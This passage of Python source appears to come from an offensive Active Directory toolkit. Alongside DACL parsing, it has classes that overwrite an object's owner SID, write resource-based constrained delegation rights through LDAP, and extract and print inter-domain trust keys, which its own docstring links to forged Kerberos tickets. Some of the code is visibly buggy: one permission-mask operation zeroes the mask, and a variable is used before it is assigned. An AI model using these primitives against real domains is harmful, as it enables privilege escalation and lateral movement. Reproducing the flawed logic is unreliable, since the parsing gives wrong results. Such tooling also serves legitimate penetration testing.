    ReadProperties = 0x00000010 # ADS_RIGHT_DS_READ_PROP
    Self = 0x00000008 # ADS_RIGHT_DS_SELF
    ListChildObjects = 0x00000004 # ADS_RIGHT_ACTRL_DS_LIST
    DeleteChild = 0x00000002 # ADS_RIGHT_DS_DELETE_CHILD
    CreateChild = 0x00000001 # ADS_RIGHT_DS_CREATE_CHILD

class SIMPLE_PERMISSIONS(Enum):
    FullControl = 0xf01ff
    Modify = 0x0301bf
    ReadAndExecute = 0x0200a9
    ReadAndWrite = 0x02019f
    Read = 0x20094
    Write = 0x200bc

class ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):
    ControlAccess = ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
    CreateChild = ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CREATE_CHILD
    DeleteChild = ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_DELETE_CHILD
    ReadProperty = ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_READ_PROP
    WriteProperty = ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
    Self = ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_SELF

class ACLEnum:
    def __init__(self, powerview, entries, root_dn, resolveguids=None, targetidentity=None, principalidentity=None, guids_map_dict=None):
        self.entries = entries
        self.powerview = powerview
        self.root_dn = root_dn
        self.objectdn = ''
        self.objectsid = ''

        self.__resolveguids = resolveguids
        self.__targetidentity = targetidentity
        self.__principalidentity = principalidentity
        
        # Combine the GUID maps
        self.__guids_map_dict = {}
        # Add guids_map_dict if provided
        if guids_map_dict:
            self.__guids_map_dict.update(guids_map_dict)
        
        # Add EXTENDED_RIGHTS_MAP (key: guid, value: name)
        self.__guids_map_dict.update(EXTENDED_RIGHTS_MAP)
        self.__guids_map_dict.update(SCHEMA_OBJECTS)
        
        # Add reverse mapping from EXTENDED_RIGHTS_NAME_MAP (key: guid, value: name)
        # This is already the reverse of EXTENDED_RIGHTS_MAP, so we don't need to add it
        
        # Create reverse mapping for lookups by name
        self.__rights_name_map = {v: k for k, v in self.__guids_map_dict.items()}


    def read_dacl(self):
        parsed_dacl = []
        LOG.debug("[ACLEnum] Parsing DACL")
        for entry in self.entries:
            dacl_dict = {}
            
            secDescData = entry.get('attributes', {}).get('nTSecurityDescriptor')
            if not secDescData:
                LOG.debug(f'[ACLEnum] ntSecurityDescriptor attribute not found for {entry.get("dn")}')
                continue
            
            if isinstance(secDescData, list):
                secDescData = secDescData[0]
            
            objectsid = entry.get('attributes', {}).get('objectSid') or None
            if isinstance(objectsid, list) and len(objectsid) > 0:
                objectsid = objectsid[0]
            
            try:
                secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
                self.objectdn = entry.get('dn')
                self.objectsid = objectsid
                dacl = self.parseDACL(secDesc['Dacl'])
                if dacl:
                    dacl_dict['attributes'] = dacl
                    parsed_dacl.append(dacl_dict)
            except Exception as e:
                LOG.debug(f'[ACLEnum] Error parsing security descriptor for {entry.get("dn")}: {str(e)}')
                continue
            
        return parsed_dacl

    def parseDACL(self, dacl):
        parsed_dacl = []
        for ace in dacl['Data']:
            parsed_ace = self.parseACE(ace)
            if parsed_ace:
                parsed_dacl.append(parsed_ace)
        return parsed_dacl

    def parseACE(self, ace):
        if self.__principalidentity and self.__principalidentity != ace["Ace"]["Sid"].formatCanonical():
            return

        if ace['TypeName'] in ["ACCESS_ALLOWED_ACE", "ACCESS_ALLOWED_OBJECT_ACE", "ACCESS_DENIED_ACE", "ACCESS_DENIED_OBJECT_ACE"]:
            parsed_ace = {}
            parsed_ace['ObjectDN'] = self.objectdn
            parsed_ace['ObjectSID'] = format_sid(self.objectsid)
            parsed_ace['ACEType'] = ace['TypeName']
            
            # Parse ACE Flags
            _ace_flags = [FLAG.name for FLAG in ACE_FLAGS if ace.hasFlag(FLAG.value)]
            parsed_ace['ACEFlags'] = ", ".join(_ace_flags) or "None"
            
            if ace['TypeName'] in ["ACCESS_ALLOWED_ACE", "ACCESS_DENIED_ACE"]:
                parsed_ace['ActiveDirectoryRights'] = ",".join(self.parsePerms(ace["Ace"]["Mask"]["Mask"]))
                parsed_ace['AccessMask'] = ",".join(self.parsePerms(ace['Ace']['Mask']['Mask']))
                parsed_ace['InheritanceType'] = "None"
                parsed_ace['SecurityIdentifier'] = self.powerview.convertfrom_sid(ace['Ace']['Sid'].formatCanonical())
            
            elif ace['TypeName'] in ["ACCESS_ALLOWED_OBJECT_ACE", "ACCESS_DENIED_OBJECT_ACE"]:
                # Parse Access Mask Flags
                _access_mask_flags = [FLAG.name for FLAG in ALLOWED_OBJECT_ACE_MASK_FLAGS if ace['Ace']['Mask'].hasPriv(FLAG.value)]
                parsed_ace['AccessMask'] = ", ".join(_access_mask_flags)
                
                # Parse Object Flags
                _object_flags = [FLAG.name for FLAG in OBJECT_ACE_FLAGS if ace['Ace'].hasFlag(FLAG.value)]
                parsed_ace['ObjectAceFlags'] = ", ".join(_object_flags) or None
                
                # Parse ObjectType GUID
                if ace['Ace']['ObjectTypeLen'] != 0:
                    obj_type = bin_to_string(ace['Ace']['ObjectType']).lower()
                    parsed_ace['ObjectAceType'] = self.__guids_map_dict.get(obj_type, "UNKNOWN (%s)" % obj_type)
                
                # Parse InheritedObjectType GUID
                if ace['Ace']['InheritedObjectTypeLen'] != 0:
                    inh_obj_type = bin_to_string(ace['Ace']['InheritedObjectType']).lower()
                    parsed_ace['InheritanceType'] = self.__guids_map_dict.get(inh_obj_type, "UNKNOWN (%s)" % inh_obj_type)
                else:
                    parsed_ace['InheritanceType'] = None
                
                # Parse Trustee SID
                parsed_ace['SecurityIdentifier'] = self.powerview.convertfrom_sid(ace['Ace']['Sid'].formatCanonical())
        else:
            LOG.debug("ACE Type (%s) unsupported for parsing yet, feel free to contribute" % ace['TypeName'])
            parsed_ace = {'ACEType': ace['TypeName'], 'ACEFlags': ", ".join(_ace_flags) or "None", 'DEBUG': "ACE type not supported for parsing by dacleditor.py, feel free to contribute"}
        
        return parsed_ace

    def parsePerms(self, fsr):
        _perms = []
        for PERM in SIMPLE_PERMISSIONS:
            if (fsr & PERM.value) == PERM.value:
                _perms.append(PERM.name)
                fsr = fsr & (not PERM.value)
        for PERM in ACCESS_MASK:
            if fsr & PERM.value:
                _perms.append(PERM.name)
        return _perms

class ObjectOwner:
    def __init__(self, entry):
        try:
            self.__target_samaccountname = entry["attributes"]["sAMAccountName"][0] if isinstance(entry["attributes"]["sAMAccountName"],list) else entry["attributes"]["sAMAccountName"]
        except IndexError as e:
            pass
        try:
            self.__target_sid = entry["attributes"]["objectSid"][0] if isinstance(entry["attributes"]["objectSid"], list) else entry["attributes"]["objectSid"]
        except IndexError as e:
            pass
        try:
            self.__target_dn = entry["attributes"]["distinguishedName"][0] if isinstance(entry["attributes"]["distinguishedName"], list) else entry["attributes"]["distinguishedName"]
        except IndexError as e:
            pass
        try:
            self.__target_secdesc = entry["attributes"]["nTSecurityDescriptor"][0] if isinstance(entry["attributes"]["nTSecurityDescriptor"], list) else entry["attributes"]["nTSecurityDescriptor"]
        except IndexError as e:
            pass
        self.__target_securitydescriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.__target_secdesc)

        self.new_owner_samaccountname = None
        self.new_owner_sid = None
        self.new_owner_dn = None

    def modify_securitydescriptor(self, entry):
        try:
            self.new_owner_samaccountname = entry["attributes"]["sAMAccountName"][0] if isinstance(entry["attributes"]["sAMAccountName"], list) else entry["attributes"]["sAMAccountName"]
        except IndexError as e:
            pass
        try:
            self.new_owner_sid = entry["attributes"]["objectSid"][0] if isinstance(entry["attributes"]["objectSid"], list) else entry["attributes"]["objectSid"]
        except IndexError as e:
            pass
        try:
            self.new_owner_dn = entry["attributes"]["distinguishedName"] if isinstance(entry["attributes"]["distinguishedName"], list) else entry["attributes"]["distinguishedName"]
        except IndexError as e:
            pass

        new_owner_sid = ldaptypes.LDAP_SID()
        new_owner_sid.fromCanonical(self.new_owner_sid)

        logging.debug("Modifying %s OwnerSid to %s" % (self.__target_dn, self.new_owner_sid))

        self.__target_securitydescriptor['OwnerSid'] = new_owner_sid
        return self.__target_securitydescriptor

    def read(self):
        ownersid = None
        ownersid = format_sid(self.__target_securitydescriptor['OwnerSid']).formatCanonical()
        return ownersid

class RBCD:
    def __init__(self, entry, ldap_session=None):
        try:
            self.__target_samaccountname = entry["attributes"]["sAMAccountName"][0] if isinstance(entry["attributes"]["sAMAccountName"], list) else entry["attributes"]["sAMAccountName"]
        except IndexError as e:
            self.__target_samaccountname = None
            pass
        try:
            self.__target_sid = entry["attributes"]["objectSid"][0] if isinstance(entry["attributes"]["objectSid"], list) else entry["attributes"]["objectSid"]
        except IndexError as e:
            self.__target_sid = None
            pass
        try:
            self.__target_dn = entry["attributes"]["distinguishedName"][0] if isinstance(entry["attributes"]["distinguishedName"], list) else entry["attributes"]["distinguishedName"]
        except IndexError as e:
            self.__target_dn = None
            pass
        try:
            self.__target_msds_allowedtoactonbehalfofotheridentity = entry["attributes"]["msDS-AllowedToActOnBehalfOfOtherIdentity"][0] if isinstance(entry["attributes"]["msDS-AllowedToActOnBehalfOfOtherIdentity"], list) else entry["attributes"]["msDS-AllowedToActOnBehalfOfOtherIdentity"]
        except IndexError as e:
            self.__target_msds_allowedtoactonbehalfofotheridentity = None
            pass
        try:
            self.__target_securitydescriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.__target_msds_allowedtoactonbehalfofotheridentity)
        except:
            self.__target_securitydescriptor = None
            pass


        self.ldap_session = ldap_session

    def read(self):
        if self.__target_securitydescriptor is None:
            logging.error("[RBCD] msDS-AllowedToActOnBehalfOfOtherIdentity not found in object")
            return

        user_can_delegate = []
        sd = self.__target_securitydescriptor
        if len(sd['Dacl'].aces) > 0:
            for ace in sd['Dacl'].aces:
                user_can_delegate.append(ace['Ace']['Sid'].formatCanonical())

        return user_can_delegate

    def write_to(self, objectsid):
        logging.debug("[RBCD] Creating SDDL manually")
        sd = create_empty_sd()
        sd['Dacl'].aces.append(create_allow_ace(objectsid))
        logging.debug(f"[RBCD] Appended {objectsid} to SDDL")
        self.ldap_session.modify(
            self.__target_dn,
            {
                'msDS-AllowedToActOnBehalfOfOtherIdentity':[ldap3.MODIFY_REPLACE, [sd.getData()]]
            }
        )
        if self.ldap_session.result['result'] == 0:
            return True
        else:
            if self.ldap_session.result['result'] == 50:
                logging.error('Could not modify object, the server reports insufficient rights: %s', self.ldap_session.result['message'])
            elif self.ldap_session.result['result'] == 19:
                logging.error('Could not modify object, the server reports a constrained violation: %s', self.ldap_session.result['message'])
            else:
                logging.error('The server returned an error: %s', self.ldap_session.result['message'])
            return False

class Trust:
    """
    Class for processing domain trust LDAP objects, including all trust attributes:
    - Basic properties (name, trustPartner, flatName, etc.)
    - Security identifier
    - Security descriptor (nTSecurityDescriptor)
    - Trust authentication keys (trustAuthIncoming, trustAuthOutgoing)
    
    This class handles the parsing of all trust-related attributes and provides
    structured access to the trust information.
    
    Usage:
    ```
    # Process a trust entry from LDAP
    trust_entry = ldap_entries[0]  # From get_domaintrust()
    trust = Trust(trust_entry)
    
    # Access processed trust information
    print(f"Trust Name: {trust.name}")
    print(f"Trust Partner: {trust.trust_partner}")
    print(f"Trust Direction: {trust.trust_direction}")
    
    # Access trust keys
    if trust.has_incoming_keys():
        print("Incoming Keys:")
        for key in trust.incoming_keys:
            print(f"  {key['KeyType']}: {key['Key']}")
    
    # Get a structured dictionary representation
    trust_dict = trust.to_dict()
    ```
    
    Security note:
    These trust attributes, especially trust keys, are highly sensitive and can be used 
    for various attacks including:
    - Creating forged Kerberos tickets for lateral movement across trust boundaries
    - Impersonating users from the trusted domain
    
    Extraction and use of these attributes requires high privileges (usually Domain Admin).
    """
    # Trust key types
    TRUST_AUTH_TYPE_CLEAR = 0x1      # Plaintext (not used)
    TRUST_AUTH_TYPE_NT4OWF = 0x2     # NT4 OWF (not used)
    TRUST_AUTH_TYPE_CLEAR_PW = 0x3   # UTF-16 plaintext password
    TRUST_AUTH_TYPE_CLEAR_NT_ONLY = 0x4  # RC4-HMAC key only (used for NT-compatible domains)
    TRUST_AUTH_TYPE_CLEAR_BOTH = 0x5 # RC4-HMAC and UTF-16 plaintext password
    TRUST_AUTH_TYPE_VERSION = 0x6    # VERSION (contains AES keys)
    
    # Trust direction
    TRUST_DIRECTION_DISABLED = 0
    TRUST_DIRECTION_INBOUND = 1
    TRUST_DIRECTION_OUTBOUND = 2
    TRUST_DIRECTION_BIDIRECTIONAL = 3
    
    # Trust type
    TRUST_TYPE_DOWNLEVEL = 1     # Windows NT 4.0 or earlier
    TRUST_TYPE_UPLEVEL = 2       # Windows 2000 or later
    TRUST_TYPE_MIT = 3           # MIT Kerberos realm
    TRUST_TYPE_DCE = 4           # DCE realm
    
    # Trust attributes
    TRUST_ATTRIBUTE_NON_TRANSITIVE = 0x00000001
    TRUST_ATTRIBUTE_UPLEVEL_ONLY = 0x00000002
    TRUST_ATTRIBUTE_QUARANTINED_DOMAIN = 0x00000004
    TRUST_ATTRIBUTE_FOREST_TRANSITIVE = 0x00000008
    TRUST_ATTRIBUTE_CROSS_ORGANIZATION = 0x00000010
    TRUST_ATTRIBUTE_WITHIN_FOREST = 0x00000020
    TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL = 0x00000040
    TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION = 0x00000080
    
    def __init__(self, entry=None):
        """
        Initialize a Trust object from an LDAP entry.
        
        Args:
            entry: An LDAP entry dictionary from get_domaintrust()
        """
        # Basic attributes
        self.dn = None
        self.name = None
        self.trust_partner = None
        self.flat_name = None
        self.trust_direction = None
        self.trust_type = None
        self.trust_attributes = None
        self.when_created = None
        self.when_changed = None
        
        # Security
        self.security_identifier = None
        self.owner_sid = None
        
        # Trust keys
        self.incoming_keys_raw = None
        self.outgoing_keys_raw = None
        self.incoming_keys = []
        self.outgoing_keys = []
        
        # Process the entry if provided
        if entry:
            self.process_entry(entry)
    
    def process_entry(self, entry):
        """
        Process an LDAP entry and extract all trust attributes.
        
        Args:
            entry: An LDAP entry dictionary from get_domaintrust()
        """
        if not entry:
            return
            
        if 'dn' in entry:
            self.dn = entry['dn']
        
        # Extract basic attributes
        attrs = entry.get('attributes', {})
        self.name = attrs.get('name', None)
        self.trust_partner = attrs.get('trustPartner', None)
        self.flat_name = attrs.get('flatName', None)
        self.trust_direction = attrs.get('trustDirection', None)
        self.trust_type = attrs.get('trustType', None)
        self.trust_attributes = attrs.get('trustAttributes', None)
        self.when_created = attrs.get('whenCreated', None)
        self.when_changed = attrs.get('whenChanged', None)
        
        # Process security identifier
        if 'securityIdentifier' in attrs:
            try:
                self.security_identifier = format_sid(attrs['securityIdentifier'])
            except Exception as e:
                LOG.error(f"Error parsing securityIdentifier: {str(e)}")
        
        # Process security descriptor
        if 'nTSecurityDescriptor' in attrs:
            try:
                sec_desc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=attrs['nTSecurityDescriptor'])
                if sec_desc['OwnerSid']:
                    self.owner_sid = sec_desc['OwnerSid'].formatCanonical()
            except Exception as e:
                LOG.error(f"Error parsing security descriptor: {str(e)}")
        
        # Process trust keys
        if 'trustAuthIncoming' in attrs and attrs['trustAuthIncoming']:
            try:
                # Get raw data
                auth_in = attrs['trustAuthIncoming']
                if isinstance(auth_in, list) and auth_in:
                    auth_in = auth_in[0]
                self.incoming_keys_raw = auth_in
                
                # Parse the data
                self.incoming_keys = self._parse_auth_data(auth_in)
            except Exception as e:
                LOG.error(f"Error parsing trustAuthIncoming: {str(e)}")
                import traceback
                LOG.debug(traceback.format_exc())
        
        if 'trustAuthOutgoing' in attrs and attrs['trustAuthOutgoing']:
            try:
                # Get raw data
                auth_out = attrs['trustAuthOutgoing']
                if isinstance(auth_out, list) and auth_out:
                    auth_out = auth_out[0]
                self.outgoing_keys_raw = auth_out
                
                # Parse the data
                self.outgoing_keys = self._parse_auth_data(auth_out)
            except Exception as e:
                LOG.error(f"Error parsing trustAuthOutgoing: {str(e)}")
                import traceback
                LOG.debug(traceback.format_exc())
    
    def _parse_auth_data(self, auth_data):
        """
        Parse the binary trustAuthIncoming/trustAuthOutgoing data
        
        The structure is:
        - Version (2 bytes)
        - Count (2 bytes) - number of entries
        - Entries array where each entry contains:
            - Type (4 bytes) - type of auth data
            - Time (8 bytes) - timestamp
            - Data (variable length) - the actual key material
            
        Returns:
            List of dictionaries with parsed key information
        """
        if not auth_data:
            return []
            
        entries = []
        try:
            pos = 0
            version = int.from_bytes(auth_data[pos:pos+2], byteorder='little')
            pos += 2
            count = int.from_bytes(auth_data[pos:pos+2], byteorder='little')
            pos += 2
            
            for _ in range(count):
                entry = {}
                entry['Version'] = version
                
                # Get auth type
                auth_type = int.from_bytes(auth_data[pos:pos+4], byteorder='little')
                entry['AuthType'] = auth_type
                pos += 4
                
                # Get timestamp
                timestamp = int.from_bytes(auth_data[pos:pos+8], byteorder='little')
                entry['Timestamp'] = self._windows_time_to_datetime(timestamp)
                pos += 8
                
                # Determine auth data length and get the data
                if auth_type == self.TRUST_AUTH_TYPE_VERSION:
                    # Version structure for AES keys
                    auth_data_len = 12 + 32  # Header (12) + AES256 key (32)
                    raw_data = auth_data[pos:pos+auth_data_len]
                    
                    # Extract fields from VERSION structure
                    version_size = int.from_bytes(raw_data[0:2], byteorder='little')
                    version_type = int.from_bytes(raw_data[2:4], byteorder='little')
                    version_current = int.from_bytes(raw_data[4:8], byteorder='little')
                    version_previous = int.from_bytes(raw_data[8:12], byteorder='little')
                    
                    entry['KeyType'] = 'AES256' if version_size == 32 else f'Unknown-{version_size}'
                    entry['VersionType'] = version_type
                    entry['VersionCurrent'] = version_current
                    entry['VersionPrevious'] = version_previous
                    
                    # Get the actual key material (skip the header)
                    key_material = raw_data[12:12+version_size]
                    entry['Key'] = key_material.hex()
                    
                elif auth_type in [self.TRUST_AUTH_TYPE_CLEAR_NT_ONLY, self.TRUST_AUTH_TYPE_CLEAR_BOTH]:
                    # RC4-HMAC key
                    auth_data_len = 16  # RC4-HMAC key (16 bytes)
                    key_material = auth_data[pos:pos+auth_data_len]
                    entry['KeyType'] = 'RC4-HMAC'
                    entry['Key'] = key_material.hex()
                    
                elif auth_type == self.TRUST_AUTH_TYPE_CLEAR_PW:
                    # UTF-16 encoded password
                    # Need to find null terminator
                    start = pos
                    while pos < len(auth_data):
                        if auth_data[pos:pos+2] == b'\x00\x00':
                            pos += 2  # Include null terminator
                            break
                        pos += 2
                    
                    auth_data_len = pos - start
                    password_bytes = auth_data[start:pos]
                    try:
                        entry['KeyType'] = 'Password'
                        entry['Key'] = password_bytes.decode('utf-16-le')
                    except:
                        entry['KeyType'] = 'Password (binary)'
                        entry['Key'] = password_bytes.hex()
                else:
                    # Unknown type, grab a reasonable amount of data
                    auth_data_len = 16  # Default size
                    entry['KeyType'] = f'Unknown-{auth_type}'
                    entry['Key'] = auth_data[pos:pos+auth_data_len].hex()
                
                pos += auth_data_len
                entries.append(entry)
                
        except Exception as e:
            LOG.error(f'Error parsing auth data: {str(e)}')
            import traceback
            LOG.debug(traceback.format_exc())
            
        return entries
    
    def _windows_time_to_datetime(self, windows_time):
        """Convert Windows filetime to Python datetime"""
        try:
            # Windows time is in 100-nanosecond intervals since January 1, 1601
            # Need to convert to seconds and adjust for the epoch difference
            seconds_since_1601 = windows_time / 10000000
            epoch_diff = 11644473600  # Seconds between 1601-01-01 and 1970-01-01
            unix_time = seconds_since_1601 - epoch_diff
            
            # Convert to datetime
            return datetime.datetime.fromtimestamp(unix_time).isoformat()
        except:
            return str(windows_time)
    
    def has_incoming_keys(self):
        """Check if the trust has incoming keys"""
        return len(self.incoming_keys) > 0
    
    def has_outgoing_keys(self):
        """Check if the trust has outgoing keys"""
        return len(self.outgoing_keys) > 0
    
    def get_latest_key(self, key_type=None, direction="incoming"):
        """
        Get the most recent key of the specified type and direction
        
        Args:
            key_type: Type of key to get (e.g., 'AES256', 'RC4-HMAC')
            direction: 'incoming' or 'outgoing'
            
        Returns:
            Dictionary with key information or None if not found
        """
        keys = self.incoming_keys if direction.lower() == "incoming" else self.outgoing_keys
        
        if not keys:
            return None
            
        # If no key type specified, get the newest key of any type
        if key_type is None:
            return keys[0]
            
        for entry in keys:
            if entry.get('KeyType') == key_type:
                return entry
                
        return None
    
    def get_trust_direction_string(self):
        """Get a human-readable string for the trust direction"""
        if self.trust_direction is None:
            return "Unknown"
            
        direction_map = {
            self.TRUST_DIRECTION_DISABLED: "Disabled",
            self.TRUST_DIRECTION_INBOUND: "Inbound",
            self.TRUST_DIRECTION_OUTBOUND: "Outbound",
            self.TRUST_DIRECTION_BIDIRECTIONAL: "Bidirectional"
        }
        
        return direction_map.get(self.trust_direction, f"Unknown ({self.trust_direction})")
    
    def get_trust_type_string(self):
        """Get a human-readable string for the trust type"""
        if self.trust_type is None:
            return "Unknown"
            
        type_map = {
            self.TRUST_TYPE_DOWNLEVEL: "Windows NT 4.0 or earlier (DOWNLEVEL)",
            self.TRUST_TYPE_UPLEVEL: "Windows 2000 or later (UPLEVEL)",
            self.TRUST_TYPE_MIT: "MIT Kerberos realm",
            self.TRUST_TYPE_DCE: "DCE realm"
        }
        
        return type_map.get(self.trust_type, f"Unknown ({self.trust_type})")
    
    def get_trust_attributes_list(self):
        """Get a list of trust attribute flags as strings"""
        if self.trust_attributes is None:
            return ["None"]
            
        attribute_map = {
            self.TRUST_ATTRIBUTE_NON_TRANSITIVE: "Non-Transitive",
            self.TRUST_ATTRIBUTE_UPLEVEL_ONLY: "Uplevel Only",
            self.TRUST_ATTRIBUTE_QUARANTINED_DOMAIN: "Quarantined Domain",
            self.TRUST_ATTRIBUTE_FOREST_TRANSITIVE: "Forest Transitive",
            self.TRUST_ATTRIBUTE_CROSS_ORGANIZATION: "Cross-Organization",
            self.TRUST_ATTRIBUTE_WITHIN_FOREST: "Within Forest",
            self.TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL: "Treat as External",
            self.TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION: "Uses RC4 Encryption"
        }
        
        result = []
        for flag, name in attribute_map.items():
            if self.trust_attributes & flag:
                result.append(name)
                
        return result if result else ["None"]
    
    def to_dict(self):
        """Return a dictionary representation of the trust"""
        return {
            'DistinguishedName': self.dn,
            'Name': self.name,
            'TrustPartner': self.trust_partner,
            'FlatName': self.flat_name,
            'TrustDirection': {
                'Value': self.trust_direction,
                'Name': self.get_trust_direction_string()
            },
            'TrustType': {
                'Value': self.trust_type,
                'Name': self.get_trust_type_string()
            },
            'TrustAttributes': {
                'Value': self.trust_attributes,
                'Flags': self.get_trust_attributes_list()
            },
            'WhenCreated': self.when_created,
            'WhenChanged': self.when_changed,
            'SecurityIdentifier': self.security_identifier,
            'OwnerSid': self.owner_sid,
            'IncomingTrustKeys': self.incoming_keys,
            'OutgoingTrustKeys': self.outgoing_keys
        }
    
    def __str__(self):
        """Return a human-readable string representation of the trust"""
        result = f"Trust: {self.name}\n"
        result += f"  Distinguished Name: {self.dn}\n"
        result += f"  Trust Partner: {self.trust_partner}\n"
        result += f"  Trust Direction: {self.get_trust_direction_string()}\n"
        result += f"  Trust Type: {self.get_trust_type_string()}\n"
        result += f"  Trust Attributes: {', '.join(self.get_trust_attributes_list())}\n"
        result += f"  Security Identifier: {self.security_identifier}\n"
        result += f"  Owner SID: {self.owner_sid}\n"
        
        if self.has_incoming_keys():
            result += "  Incoming Trust Keys:\n"
            for i, key in enumerate(self.incoming_keys):
                result += f"    Key {i+1}: {key.get('KeyType', 'Unknown')}, {key.get('Timestamp', 'N/A')}\n"
                result += f"      Value: {key.get('Key', 'N/A')}\n"
        else:
            result += "  Incoming Trust Keys: None\n"
            
        if self.has_outgoing_keys():
            result += "  Outgoing Trust Keys:\n"
            for i, key in enumerate(self.outgoing_keys):
                result += f"    Key {i+1}: {key.get('KeyType', 'Unknown')}, {key.get('Timestamp', 'N/A')}\n"
                result += f"      Value: {key.get('Key', 'N/A')}\n"
        else:
            result += "  Outgoing Trust Keys: None\n"
            
        return result

# For backward compatibility
TrustKeyInfo = Trust
